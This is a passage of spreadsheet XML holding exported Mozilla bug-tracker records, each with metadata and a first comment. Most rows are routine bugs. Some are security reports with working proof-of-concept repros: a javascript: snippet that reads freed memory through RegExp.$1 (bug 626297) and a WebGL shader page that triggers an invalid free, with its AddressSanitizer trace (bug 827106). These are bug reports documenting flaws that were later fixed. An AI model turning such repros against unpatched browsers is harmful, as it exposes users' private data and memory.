      <c r="R6377" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6377" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T6377" t="n">
        <v>1</v>
      </c>
      <c r="U6377" t="n">
        <v>0</v>
      </c>
      <c r="V6377" t="n">
        <v>8</v>
      </c>
      <c r="W6377" t="inlineStr">
        <is>
          <t>(I know the mock has this incorrect, but we should still fix it.)
re: the subheading on https://sm-weave-proxy01.services.mozilla.com/store/upload_persona_step1_tmpl.html
The text "It’s easy to create your own Persona just follow the easy steps below!" is unwieldy; it should read either:
1) "It's easy to create your own Persona; just follow the easy steps below!"
-or-
2) "It's easy to create your own Persona, just follow the easy steps below!"
(Listed in order of preference.)</t>
        </is>
      </c>
      <c r="X6377" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6378">
      <c r="A6378" t="n">
        <v>1273202</v>
      </c>
      <c r="B6378" t="inlineStr">
        <is>
          <t>2016-05-16 10:26:14 -0700</t>
        </is>
      </c>
      <c r="C6378" t="inlineStr">
        <is>
          <t>HTMLInputElement may dispatch events inside its destructor</t>
        </is>
      </c>
      <c r="D6378" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:32 -0700</t>
        </is>
      </c>
      <c r="E6378" t="n">
        <v>1</v>
      </c>
      <c r="F6378" t="n">
        <v>1</v>
      </c>
      <c r="G6378" t="n">
        <v>3</v>
      </c>
      <c r="H6378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6378" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6378" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6378" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L6378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6378" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6378" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q6378" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6378" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T6378" t="n">
        <v>1</v>
      </c>
      <c r="U6378" t="n">
        <v>0</v>
      </c>
      <c r="V6378" t="n">
        <v>11</v>
      </c>
      <c r="W6378" t="inlineStr">
        <is>
          <t>Created attachment 8752942
patch
This should fix bug 1210595.</t>
        </is>
      </c>
      <c r="X6378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6379">
      <c r="A6379" t="n">
        <v>222514</v>
      </c>
      <c r="B6379" t="inlineStr">
        <is>
          <t>2003-10-16 14:49:09 -0700</t>
        </is>
      </c>
      <c r="C6379" t="inlineStr">
        <is>
          <t>download page</t>
        </is>
      </c>
      <c r="D6379" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E6379" t="n">
        <v>1</v>
      </c>
      <c r="F6379" t="n">
        <v>1</v>
      </c>
      <c r="G6379" t="n">
        <v>5</v>
      </c>
      <c r="H6379" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6379" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J6379" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6379" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6379" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6379" t="inlineStr"/>
      <c r="Q6379" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6379" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6379" t="n">
        <v>1</v>
      </c>
      <c r="U6379" t="n">
        <v>0</v>
      </c>
      <c r="V6379" t="n">
        <v>29</v>
      </c>
      <c r="W6379" t="inlineStr">
        <is>
          <t>why are download and 'products' separate?
create a better download page. more terse than /products.html</t>
        </is>
      </c>
      <c r="X6379" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6380">
      <c r="A6380" t="n">
        <v>134360</v>
      </c>
      <c r="B6380" t="inlineStr">
        <is>
          <t>2002-03-29 22:08:02 -0800</t>
        </is>
      </c>
      <c r="C6380" t="inlineStr">
        <is>
          <t>classic: subscribe dialog/mail filters is missing dot/checkmark to un/subscribe to newsgroups.</t>
        </is>
      </c>
      <c r="D6380" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:38 -0700</t>
        </is>
      </c>
      <c r="E6380" t="n">
        <v>1</v>
      </c>
      <c r="F6380" t="n">
        <v>1</v>
      </c>
      <c r="G6380" t="n">
        <v>3</v>
      </c>
      <c r="H6380" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6380" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J6380" t="inlineStr">
        <is>
          <t>Filters</t>
        </is>
      </c>
      <c r="K6380" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6380" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6380" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N6380" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6380" t="inlineStr">
        <is>
          <t>[adt2]</t>
        </is>
      </c>
      <c r="Q6380" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6380" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6380" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T6380" t="n">
        <v>1</v>
      </c>
      <c r="U6380" t="n">
        <v>0</v>
      </c>
      <c r="V6380" t="n">
        <v>22</v>
      </c>
      <c r="W6380" t="inlineStr">
        <is>
          <t>seen in build 3-29-16 w2k.. build 3-27-03 is fine.  regression.
no checkboxes are present.
there should be checkboxes present.</t>
        </is>
      </c>
      <c r="X6380" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6381">
      <c r="A6381" t="n">
        <v>1281644</v>
      </c>
      <c r="B6381" t="inlineStr">
        <is>
          <t>2016-06-22 15:27:13 -0700</t>
        </is>
      </c>
      <c r="C6381" t="inlineStr">
        <is>
          <t>Log URLs in builds-4hr should all use HTTPS to avoid mixed content breakage of the reftest analyser</t>
        </is>
      </c>
      <c r="D6381" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E6381" t="n">
        <v>1</v>
      </c>
      <c r="F6381" t="n">
        <v>1</v>
      </c>
      <c r="G6381" t="n">
        <v>5</v>
      </c>
      <c r="H6381" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6381" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6381" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6381" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6381" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6381" t="inlineStr"/>
      <c r="Q6381" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6381" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6381" t="n">
        <v>1</v>
      </c>
      <c r="U6381" t="n">
        <v>0</v>
      </c>
      <c r="V6381" t="n">
        <v>31</v>
      </c>
      <c r="W6381" t="inlineStr">
        <is>
          <t>When trying to view a reftest log through try pushes on Windows, the log never shows up. See for example: https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=afa0986611d8&amp;selectedJob=22738463
Click on the reftest log, see "loading". From the log URL, the file doesn't actually exist, so something with either linking the correct log or the log isn't being saved seems to be the problem.</t>
        </is>
      </c>
      <c r="X6381" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6382">
      <c r="A6382" t="n">
        <v>781811</v>
      </c>
      <c r="B6382" t="inlineStr">
        <is>
          <t>2012-08-10 08:00:28 -0700</t>
        </is>
      </c>
      <c r="C6382" t="inlineStr">
        <is>
          <t>[ia] Add number of helpful votes to document search mapping for article sorting</t>
        </is>
      </c>
      <c r="D6382" t="inlineStr">
        <is>
          <t>2012-08-16 15:45:45 -0700</t>
        </is>
      </c>
      <c r="E6382" t="n">
        <v>1</v>
      </c>
      <c r="F6382" t="n">
        <v>1</v>
      </c>
      <c r="G6382" t="n">
        <v>5</v>
      </c>
      <c r="H6382" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6382" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J6382" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K6382" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6382" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6382" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6382" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6382" t="inlineStr">
        <is>
          <t>u=user c=wiki p=2</t>
        </is>
      </c>
      <c r="Q6382" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6382" t="inlineStr">
        <is>
          <t>2012.16</t>
        </is>
      </c>
      <c r="T6382" t="n">
        <v>1</v>
      </c>
      <c r="U6382" t="n">
        <v>0</v>
      </c>
      <c r="V6382" t="n">
        <v>10</v>
      </c>
      <c r="W6382" t="inlineStr">
        <is>
          <t>Add something like 'document_helpful_votes_30days' to the Document mapping.
I thought this was already there and went to sort by it for the article listing pages and realized it isn't there at all. First we need to figure out what we actually want to index. The requirement currently says:
"In phase 1, the default sort order will be by Popularity. This calculation will be based on total votes with weighting for helpfulness. This will negate the need for total page views. We will base this on 30 days historically."
Matt_G: can you clarify this? Can we just sort by the number of helpful votes in the last 30 days? Or do we need to subtract unhelpful votes? Or some other more complicated math?
Once we clarify that, we need to make the mapping and extract change. Then we can push that with a new WRITE_INDEX, do a full reindex, then update the READ_INDEX along with using this new field for sorting in the article listing page. Due to the reindex dance, I am making this a 2pt.</t>
        </is>
      </c>
      <c r="X6382" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6383">
      <c r="A6383" t="n">
        <v>733305</v>
      </c>
      <c r="B6383" t="inlineStr">
        <is>
          <t>2012-03-06 00:04:35 -0800</t>
        </is>
      </c>
      <c r="C6383" t="inlineStr">
        <is>
          <t>I can confuse gPluginHandler.handleEvent by listening for mutation events</t>
        </is>
      </c>
      <c r="D6383" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E6383" t="n">
        <v>1</v>
      </c>
      <c r="F6383" t="n">
        <v>1</v>
      </c>
      <c r="G6383" t="n">
        <v>6</v>
      </c>
      <c r="H6383" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6383" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J6383" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K6383" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6383" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6383" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6383" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6383" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q6383" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6383" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6383" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T6383" t="n">
        <v>1</v>
      </c>
      <c r="U6383" t="n">
        <v>0</v>
      </c>
      <c r="V6383" t="n">
        <v>46</v>
      </c>
      <c r="W6383" t="inlineStr">
        <is>
          <t>JavaScript error: chrome://browser/content/browser.js, line 10437: iconStatus is null
&gt;          let installStatus = doc.getAnonymousElementByAttribute(plugin, "class", "installStatus");
&gt;          installStatus.setAttribute("status", "ready");
&gt;          let iconStatus = doc.getAnonymousElementByAttribute(plugin, "class", "icon");
&gt;          iconStatus.setAttribute("status", "ready");
The page gets an event whose originalTarget is an anonymous DIV.  I wouldn't expect the page to be able to get a reference to this anonymous content. Related to bug 329813?</t>
        </is>
      </c>
      <c r="X6383" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6384">
      <c r="A6384" t="n">
        <v>626297</v>
      </c>
      <c r="B6384" t="inlineStr">
        <is>
          <t>2011-01-16 18:00:32 -0800</t>
        </is>
      </c>
      <c r="C6384" t="inlineStr">
        <is>
          <t>regexp-statics possibly allows to read private data</t>
        </is>
      </c>
      <c r="D6384" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:18 -0700</t>
        </is>
      </c>
      <c r="E6384" t="n">
        <v>1</v>
      </c>
      <c r="F6384" t="n">
        <v>1</v>
      </c>
      <c r="G6384" t="n">
        <v>3</v>
      </c>
      <c r="H6384" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6384" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6384" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6384" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L6384" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6384" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N6384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6384" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q6384" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6384" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6384" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6384" t="n">
        <v>1</v>
      </c>
      <c r="U6384" t="n">
        <v>0</v>
      </c>
      <c r="V6384" t="n">
        <v>13</v>
      </c>
      <c r="W6384" t="inlineStr">
        <is>
          <t>Created attachment 504334
screenshot of the success case
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.13) Gecko/20101203
Description:
When RegExp.input is set,
JSSubString which RegExp.$1 uses becomes a dangling pointer.
So, scripts can read a freed-and-recycled memory area.
Testcase:
1. Open the new tab and execute:
javascript:
  function S(v) { return "xxxxxxx,xxxxxxx,xxxx" + v; }
  /^(.*)/.exec(S(0));
  RegExp.input = S(1);
  clearInterval(window.tid);
  window.tid = setInterval(function () {
    document.title = "[" + RegExp.$1 + "]";
  }, 1000);
  void 0;
2. Then browse some sites in other tabs.</t>
        </is>
      </c>
      <c r="X6384" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6385">
      <c r="A6385" t="n">
        <v>827106</v>
      </c>
      <c r="B6385" t="inlineStr">
        <is>
          <t>2013-01-06 06:37:25 -0800</t>
        </is>
      </c>
      <c r="C6385" t="inlineStr">
        <is>
          <t>freeing unallocated address with webgl</t>
        </is>
      </c>
      <c r="D6385" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:48 -0800</t>
        </is>
      </c>
      <c r="E6385" t="n">
        <v>1</v>
      </c>
      <c r="F6385" t="n">
        <v>1</v>
      </c>
      <c r="G6385" t="n">
        <v>3</v>
      </c>
      <c r="H6385" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6385" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6385" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6385" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6385" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6385" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6385" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6385" t="inlineStr">
        <is>
          <t>[asan][adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q6385" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6385" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6385" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T6385" t="n">
        <v>1</v>
      </c>
      <c r="U6385" t="n">
        <v>0</v>
      </c>
      <c r="V6385" t="n">
        <v>49</v>
      </c>
      <c r="W6385" t="inlineStr">
        <is>
          <t>Created attachment 698424
asan repro
I load this:
&lt;html&gt;
  &lt;head&gt;
    &lt;script id="vshader" type="x-shader/x-vertex"&gt;
      void main()
      {
        gl_Position = vec4(0,0,0,0);
      }
    &lt;/script&gt;
    &lt;script id="fshader" type="x-shader/x-fragment"&gt;
      precision mediump float;
      uniform vec4 uni[1];
      void main()
      {
        vec4 c = vec4(0,0,0,0);
        for (int ii = -11; ii &lt; -10; ++ii) {
          c += uni[ii];
        }
        gl_FragColor = vec4(c.r, c.g, c.b, 0);
      }
    &lt;/script&gt;
    &lt;script&gt;
      function shader(gl, program, shaderType, shaderId) {
        var shaderSource = document.getElementById(shaderId).text
        var shader = gl.createShader(shaderType);
        gl.shaderSource(shader, shaderSource);
        gl.compileShader(shader);
        gl.attachShader(program, shader)
      }
      function aProgram(gl) {
        var program = gl.createProgram();
        shader(gl, program, gl.VERTEX_SHADER, "vshader")
        shader(gl, program, gl.FRAGMENT_SHADER, "fshader")
        gl.linkProgram(program);
        gl.useProgram(program);
        return program;
      }
      var canvas = document.createElement('canvas')
      var gl = canvas.getContext('experimental-webgl')
      aProgram(gl)
      gl.drawArrays(gl.TRIANGLES, 0, 1)
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
&lt;/html&gt;
and it says this:
ATTENTION: default value of option force_s3tc_enable overridden by environment.
=================================================================
==9645== ERROR: AddressSanitizer attempting free on address which was not malloc()-ed: 0x7fffbcd97780
    #0 0x435a70 in free ??:0
    #1 0x7fffc0d2359c in ?? ??:0
0x7fffbcd97780 is located 127 bytes to the right of 0-byte region [0x7fffbcd97701,0x7fffbcd97701)
freed by thread T0 here:
    #0 0x5a1105ffffffff
    #1 0x5a11063cd9567f
    #2 0x7ffeffffffff
    #3 0xbcd9827f
    #4 0x7fffbcd9767f in  
    #5 0x7ffeffffffff
    #6 0xfffffffe
    #7 0xfffffffd
    #8 0xfffffffc
    #9 0xfffffffb
previously allocated by thread T0 here:
    #0 0x435ba1 in __interceptor_calloc ??:0
    #1 0x7fffc0d23766 in ?? ??:0
Stats: 114M malloced (136M for red zones) by 294525 calls
Stats: 4M realloced by 16786 calls
Stats: 53M freed by 157098 calls
Stats: 0M really freed by 0 calls
Stats: 288M (73768 full pages) mmaped in 66 calls
  mmaps   by size class: 8:262128; 9:24573; 10:12285; 11:8188; 12:3072; 13:1536; 14:768; 15:384; 16:960; 17:128; 18:32; 19:16; 20:8; 21:2; 24:2;
  mallocs by size class: 8:252481; 9:22353; 10:8092; 11:6586; 12:1960; 13:1014; 14:679; 15:272; 16:939; 17:111; 18:20; 19:9; 20:5; 21:2; 24:2;
  frees   by size class: 8:133911; 9:11537; 10:4458; 11:4249; 12:926; 13:770; 14:493; 15:169; 16:487; 17:83; 18:9; 19:3; 20:3;
  rfrees  by size class:
Stats: malloc large: 149 small slow: 1554
==9645== ABORTING
on linux, intel driver</t>
        </is>
      </c>
      <c r="X6385" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6386">
      <c r="A6386" t="n">
        <v>465825</v>
      </c>
      <c r="B6386" t="inlineStr">
        <is>
          <t>2008-11-19 14:24:50 -0800</t>
        </is>
      </c>
      <c r="C6386" t="inlineStr">
        <is>
          <t>bm-xserve08 not responsive</t>
        </is>
      </c>
      <c r="D6386" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6386" t="n">
        <v>1</v>
      </c>
      <c r="F6386" t="n">
        <v>1</v>
      </c>
      <c r="G6386" t="n">
        <v>5</v>
      </c>
      <c r="H6386" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6386" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6386" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6386" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6386" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6386" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6386" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6386" t="inlineStr"/>
      <c r="Q6386" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6386" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6386" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6386" t="n">
        <v>1</v>
      </c>
      <c r="U6386" t="n">
        <v>0</v>
      </c>
      <c r="V6386" t="n">
        <v>8</v>
      </c>
      <c r="W6386" t="inlineStr">
        <is>
          <t>nagios reported a timeout for its checks on RAID, avg load, and root disk usage at 2pm PST, while PING is still ok. Also can't get a logon by ssh (establishes a connection but goes no further) or VNC (no response) so probably needs on-site investigation.
This box is Tier 1, doing Firefox 3.0.x nightlies for mac. That tree is semi-frozen at the moment but further checkins may need testing before 3.0.5 starts up.</t>
        </is>
      </c>
      <c r="X6386" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6387">
      <c r="A6387" t="n">
        <v>1260439</v>
      </c>
      <c r="B6387" t="inlineStr">
        <is>
          <t>2016-03-29 07:39:49 -0700</t>
        </is>
      </c>
      <c r="C6387" t="inlineStr">
        <is>
          <t>workerdebuggersandbox_moved needs to update the wrappercache</t>
        </is>
      </c>
      <c r="D6387" t="inlineStr">
        <is>
          <t>2019-03-31 02:28:52 -0700</t>
        </is>
      </c>
      <c r="E6387" t="n">
        <v>1</v>
      </c>
      <c r="F6387" t="n">
        <v>1</v>
      </c>
      <c r="G6387" t="n">
        <v>3</v>
      </c>
      <c r="H6387" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6387" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6387" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K6387" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6387" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6387" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6387" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6387" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q6387" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6387" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6387" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T6387" t="n">
        <v>1</v>
      </c>
      <c r="U6387" t="n">
        <v>0</v>
      </c>
      <c r="V6387" t="n">
        <v>24</v>
      </c>
      <c r="W6387" t="inlineStr">
        <is>
          <t>OK, jonco just confirmed to me that not doing this is bad.  Like "leave a dangling JSObject* there" bad.
We should fix this and uplift to all affected branches.
The specific thing that needs fixing is that workerdebuggersandbox_class has an objectMovedOp (workerdebuggersandbox_moved) that does nothing.  Presumably it has a non-null objectMovedOp because nsWrapperCache::SetWrapper asserts that the JSClass of the object being set has such a thing.  And the reason it does _that_ is because per comments above nsWrapperCache::UpdateWrapper that objectMovedOp MUST update the wrapper cache's stored pointer if the object moves.  Otherwise that pointer will be stale.</t>
        </is>
      </c>
      <c r="X6387" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6388">
      <c r="A6388" t="n">
        <v>555182</v>
      </c>
      <c r="B6388" t="inlineStr">
        <is>
          <t>2010-03-26 05:35:59 -0700</t>
        </is>
      </c>
      <c r="C6388" t="inlineStr">
        <is>
          <t>Opening up a sidebar distorts text in sidebar and sometimes on the whole page.</t>
        </is>
      </c>
      <c r="D6388" t="inlineStr">
        <is>
          <t>2010-12-17 06:56:59 -0800</t>
        </is>
      </c>
      <c r="E6388" t="n">
        <v>1</v>
      </c>
      <c r="F6388" t="n">
        <v>1</v>
      </c>
      <c r="G6388" t="n">
        <v>3</v>
      </c>
      <c r="H6388" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6388" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6388" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K6388" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6388" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6388" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6388" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6388" t="inlineStr"/>
      <c r="Q6388" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6388" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6388" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6388" t="n">
        <v>1</v>
      </c>
      <c r="U6388" t="n">
        <v>5</v>
      </c>
      <c r="V6388" t="n">
        <v>27</v>
      </c>
      <c r="W6388" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a4pre) Gecko/20100326 Minefield/3.7a4pre Firefox/3.6
Build Identifier: 20100326040105
http://img338.imageshack.us/i/68399803.png
Reproducible: Always
Steps to Reproduce:
1. Open up a sidebar
2.
3.
Actual Results:  
Text is a very light blue.
Expected Results:  
Text should be normal.
Screen Shot:  http://img338.imageshack.us/i/68399803.png</t>
        </is>
      </c>
      <c r="X6388" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6389">
      <c r="A6389" t="n">
        <v>1408708</v>
      </c>
      <c r="B6389" t="inlineStr">
        <is>
          <t>2017-10-14 15:33:37 -0700</t>
        </is>
      </c>
      <c r="C6389" t="inlineStr">
        <is>
          <t>Developer tool's traffic routes through service worker</t>
        </is>
      </c>
      <c r="D6389" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:29 -0700</t>
        </is>
      </c>
      <c r="E6389" t="n">
        <v>1</v>
      </c>
      <c r="F6389" t="n">
        <v>1</v>
      </c>
      <c r="G6389" t="n">
        <v>3</v>
      </c>
      <c r="H6389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6389" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J6389" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6389" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6389" t="inlineStr">
        <is>
          <t>Unspecified</t>
